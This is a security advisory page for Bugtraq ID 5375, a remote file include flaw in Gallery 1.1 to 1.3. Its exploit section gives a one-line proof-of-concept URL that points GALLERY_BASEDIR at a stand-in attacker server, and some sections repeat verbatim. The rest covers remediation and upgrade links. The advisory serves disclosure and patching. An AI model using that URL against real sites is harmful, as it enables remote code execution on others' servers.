Bharat Mediratta Gallery Remote File Include Vulnerability
BID:5375
Info
Bharat Mediratta Gallery Remote File Include Vulnerability
| Bugtraq ID: | 5375 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 01 2002 12:00AM |
| Updated: | Aug 01 2002 12:00AM |
| Credit: | Discovery of this vulnerability credited to PowerTech. |
| Vulnerable: |
Bharat Mediratta Gallery 1.3 Bharat Mediratta Gallery 1.2.5 Bharat Mediratta Gallery 1.2.4 Bharat Mediratta Gallery 1.2.3 Bharat Mediratta Gallery 1.2.2 Bharat Mediratta Gallery 1.2.1 p1 Bharat Mediratta Gallery 1.2.1 Bharat Mediratta Gallery 1.2 Bharat Mediratta Gallery 1.1 |
| Not Vulnerable: | |
Discussion
Bharat Mediratta Gallery Remote File Include Vulnerability
Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter.
Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter.
Exploit / POC
Bharat Mediratta Gallery Remote File Include Vulnerability
The following proof of concept was provided by [email protected]:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
The following proof of concept was provided by [email protected]:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
Solution / Fix
Bharat Mediratta Gallery Remote File Include Vulnerability
Solution:
Reportedly, exploitation of this type of vulnerability is not possible unless both 'allow_url_fopen' and 'register_globals' are enabled in the local site PHP configuration.
It is good practice to disable any unneeded options.
The vendor is aware of this vulnerabilty. Gallery version 1.3.1 will be available for download on August 2, 2002. Fixes have been made available in the Gallery CVS tree. It is recommended that users download the newest version (1.3.1-cvs-b13 or better) when upgrading from the CVS snapshots.
FreeBSD has released upgrades. Users are advised to upgrade their Ports
collection and reinstall the affected port.
The following fixes are available:
Bharat Mediratta Gallery 1.1
Bharat Mediratta Gallery 1.2
Bharat Mediratta Gallery 1.2.1
Bharat Mediratta Gallery 1.2.1 p1
Bharat Mediratta Gallery 1.2.2
Bharat Mediratta Gallery 1.2.3
Bharat Mediratta Gallery 1.2.4
Bharat Mediratta Gallery 1.2.5
Bharat Mediratta Gallery 1.3
Solution:
Reportedly, exploitation of this type of vulnerability is not possible unless both 'allow_url_fopen' and 'register_globals' are enabled in the local site PHP configuration.
It is good practice to disable any unneeded options.
The vendor is aware of this vulnerabilty. Gallery version 1.3.1 will be available for download on August 2, 2002. Fixes have been made available in the Gallery CVS tree. It is recommended that users download the newest version (1.3.1-cvs-b13 or better) when upgrading from the CVS snapshots.
FreeBSD has released upgrades. Users are advised to upgrade their Ports
collection and reinstall the affected port.
The following fixes are available:
Bharat Mediratta Gallery 1.1
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz
Bharat Mediratta Gallery 1.2
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz
Bharat Mediratta Gallery 1.2.1
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz
Bharat Mediratta Gallery 1.2.1 p1
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz
Bharat Mediratta Gallery 1.2.2
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz
Bharat Mediratta Gallery 1.2.3
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz
Bharat Mediratta Gallery 1.2.4
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz
Bharat Mediratta Gallery 1.2.5
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz -
Debian gallery_1.2.5-7.woody.0_all.deb
Debian architecture independent package.
http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5-7 .woody.0_all.deb
Bharat Mediratta Gallery 1.3
-
Bharat Mediratta current.gallery.tar.gz
Gallery daily CVS snapshot.
http://jpmullan.com/galleryupdates/daily/current.gallery.tar.gz